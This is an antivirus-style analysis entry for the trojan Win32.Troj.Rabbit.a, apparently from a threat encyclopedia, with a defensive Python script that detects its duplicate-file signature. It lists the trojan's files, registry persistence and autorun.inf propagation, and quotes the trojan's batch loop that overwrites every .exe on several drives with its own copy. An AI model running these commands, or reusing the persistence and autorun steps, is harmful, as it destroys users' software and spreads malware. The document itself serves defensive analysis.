Win32.Troj.Rabbit.a

This virus is a trojan. It directly overwrites the exe files under Program Files on drive C and on the other drives.

Basic information

  • Name: Win32.Troj.Rabbit.a
  • Aliases: N/A
  • Processing date: 2007-04-09
  • Threat level: ★
  • Virus type: Trojan
  • Affected systems: Win 9x/ME, Win 2000/NT, Win XP, Win 2003

Virus behavior

1. Files created
%SystemRoot%\system32\JK.exe
%SystemRoot%\system32\loveRabbit.exe
%SystemRoot%\system32\Rabbit.exe
%SystemRoot%\system32\love.bat
%SystemRoot%\system32\msexch400.dll
%SystemRoot%\system32\loveRabbit.bat
%SystemRoot%\msconfig.inf
%SystemRoot%\msconfig1.inf
%C:%\Rabbit.exe
%C:%\AutoRun.inf
2. Startup entries added
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\
"StubPath" = "%SystemRoot%\system32\JK.exe..."
3. Deletes the following registry entries
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
4. Message left by the virus author
I LOVE Rabbit ,and you ? look:http://**/Rabbit.***
-----------------------------------------------
hello~
Welcome!
baidu黑客吧
-------------------------------------------
5. Creates an autorun launch entry on drives c, d, e, f and g
------------------------------------
[autorun]
Shellexecute=Rabbit.exe
------------------------------------
6. Sets the hidden and system attributes on the files the virus creates
attrib +s +h %SystemRoot%\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
7. The virus replaces the exe files under Program Files on drive C and on drives d, e, f and g
---------------------------------------------------------------------
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>%SystemRoot%\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>%SystemRoot%\msconfig1.inf
FOR /f "delims=" %%i in (%SystemRoot%\msconfig.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (%SystemRoot%\msconfig1.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
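
Behavior 7 leaves every overwritten program with the same bytes as Rabbit.exe, so a set of differently named .exe files with identical content is a usable detection signal on an affected disk. The following check is an added example, not part of the original entry; the function names and the `min_cluster` threshold are assumptions chosen for illustration.

```python
import hashlib
import os
from collections import defaultdict


def sha256_of(path, chunk=1 << 20):
    """Hash a file in chunks so large executables are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_overwritten_exes(roots, min_cluster=3):
    """Return {digest: [paths]} for .exe files whose content is byte-identical
    under at least `min_cluster` distinct file names (assumed threshold)."""
    by_size = defaultdict(list)
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            for name in files:
                if name.lower().endswith(".exe"):
                    path = os.path.join(dirpath, name)
                    try:
                        by_size[os.path.getsize(path)].append(path)
                    except OSError:
                        continue  # unreadable or vanished file
    clusters = defaultdict(list)
    for paths in by_size.values():
        if len(paths) < min_cluster:
            continue  # identical content implies identical size, so skip hashing
        for path in paths:
            try:
                clusters[sha256_of(path)].append(path)
            except OSError:
                continue
    # Same installer copied under one name is normal; many *names* is not.
    return {
        digest: sorted(paths)
        for digest, paths in clusters.items()
        if len({os.path.basename(p).lower() for p in paths}) >= min_cluster
    }


if __name__ == "__main__":
    import sys
    for digest, paths in find_overwritten_exes(sys.argv[1:] or ["."]).items():
        print(digest, len(paths), "files")
        for p in paths:
            print("   ", p)
```

Run it against a mounted or offline copy of the volume; files hidden with `attrib +s +h` are still enumerated because `os.walk` does not filter on attributes.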

Propagation

The virus spreads via USB flash drives.
